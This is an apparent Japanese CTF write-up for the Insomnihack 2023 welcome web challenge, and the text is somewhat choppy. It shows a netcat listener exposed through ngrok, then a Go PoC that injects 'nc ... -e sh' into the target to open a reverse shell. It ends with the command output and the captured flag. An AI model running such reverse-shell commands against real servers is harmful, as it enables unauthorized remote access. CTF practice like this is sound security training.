このPoCを利用する。
by Dreyvor! Welcome to Insomnihack 2023 !
Let's start with an easy and well-known web exploitation.
A hipster welcome for hipster scriptkiddies, here you go!
Tomat0Soup@_Tomat0Soup_ローカルでリクエストを待ち受ける。Excited to share my latest critical security finding in the Kagus CMS - a PHP deserialization vulnerability! Check… https://t.co/rwQKfDQWPg
2023/01/18 06:55:49
$ nc -l 1234
PoCを実行する。$ ngrok tcp 1234
Webサーバと接続されているのでコマンドを実行する。$ go run poc.goTarget (e.g. https://localhost:9000):https://welcome.insomnihack.ch:8443Command (e.g. nc 192.168.0.10 2345 -e sh):nc 0.tcp.jp.ngrok.io 12649 -e sh[*] INFO: Preparing to send command: "nc 0.tcp.jp.ngrok.io 12649 -e sh" to "https://welcome.insomnihack.ch:8443"[*] INFO: Sending request...
$ nc -l 1234lscreateUserAccount.phpinfo_flagcat info_flagThe flag is located at /flag.txtcat /flag.txtINS{N3V3r_7Ru57_917HUb_r3l34532!_4lw4Y2_KoMP1L3_7H3M}